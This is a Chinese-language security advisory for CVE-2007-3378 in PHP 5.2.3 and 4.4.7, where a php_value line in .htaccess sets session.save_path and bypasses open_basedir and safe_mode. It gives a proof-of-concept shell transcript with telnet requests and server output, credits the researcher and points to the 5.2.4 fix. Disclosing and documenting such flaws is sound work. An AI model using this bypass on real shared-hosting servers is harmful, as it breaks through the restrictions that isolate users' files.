安全传递:PHP处理.htaccess文件存在安全限制漏洞
受影响系统:
PHP PHP 5.2.3
PHP PHP 4.4.7
不受影响系统:
PHP PHP 5.2.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 24661,25498
CVE(CAN) ID: CVE-2007-3378
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP在处理.htaccess文件中的配置时存在漏洞,本地攻击者可能利用此漏洞绕过PHP的某些安全限制。
如果将PHP用作Apache模块的话,就可以使用.htaccess文件中的指令更改配置设置。用户可以使用这些选项更改display_errors之类权限选项,但可以绕过不同函数中的safe_mode或open_basedir安全限制。例如,用户可以通过.htaccess设置session.save_path。在session_save_path()和ini_set()函数中对save_path检查了safe_mode和open_basedir,但在.htaccess中确可以绕过这个检查。
示例:
cxib# ls -la /www/cxib/
total 14
drwxr-xr-x 3 cxib www 512 Feb 16 20:20 .
drwxr-xr-x 11 www www 7168 Feb 16 20:07 ..
- -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.php
drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps
cxib# cat /www/cxib/stars.php
<?php
session_save_path("/inne");
session_start();
?>
cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is ´^]´.
GET /cxib/stars.php HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:22:58 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1
DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Content-Length: 732
Content-Type: text/html
<br />
<b>Warning</b>: session_save_path() [<a
href="/´";function.session-save-path´>function.session-save-path&l
t;/a>]:
open_basedir restriction in effect. File(/inne) is not within the
allowed
path(s): (/www) in <b>/www/cxib/stars.php</b> on line
<b>2</b><br />
<br />
<b>Warning</b>: session_start() [<a
href="/´";function.session-start´>function.session-start</a>
]: open_basedir
restriction in effect. File(/var/tmp/) is not within the allowed
path(s):
(/www) in <b>/www/cxib/stars.php</b> on line
<b>3</b><br />
<br />
<b>Fatal error</b>: session_start() [<a
href="/´";function.session-start´>function.session-start&l
t;/a>]: Failed to
initialize storage module: files (path: ) in
<b>/www/cxib/stars.php</b> on
line <b>3</b><br />
Connection closed by foreign host.
cxib# |
因此用户无法在目录中创建会话,但可以创建.htaccess文件,因此可以在此写入:
- ---
php_value session.save_path /inne
- ---
cxib# ls -la /www/cxib/
total 16
drwxr-xr-x 3 cxib www 512 Feb 16 20:26 .
drwxr-xr-x 11 www www 7168 Feb 16 20:26 ..
- -rw-r--r-- 1 cxib www 34 Feb 16 20:26 .htaccess
- -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.php
drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps
cxib# cat /www/cxib/.htaccess
php_value session.save_path /inne
cxib# cat /www/cxib/stars.php
<?php
session_start();
?> |
无法通过ini_set()或session_save_path()设置session.save_path,但发送以下请求:
cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is ´^]´.
GET /cxib/stars.php HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:30:42 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1
DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Connection closed by foreign host.
cxib#
cxib# ls -la /inne
total 3
drwxrwxrwx 2 root wheel 512 Feb 16 20:30 .
drwxr-xr-x 24 root wheel 1024 Feb 16 20:05 ..
- -rw------- 1 www wheel 0 Feb 16 20:30
sess_45cae9284f2f8b7cb05ce96021c9bf4e |
这样就绕过了Open_basedir和safe_mode限制。error_log和其他一些函数中也存在同样的问题。
<*来源:Maksymilian Arciemowicz (max@jestsuper.pl)
链接:http://securityreason.com/achievement_securityalert/45
http://secunia.com/advisories/26642/
http://www.php.net/releases/5_2_4.php
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.php.net/downloads.php
评论暂时关闭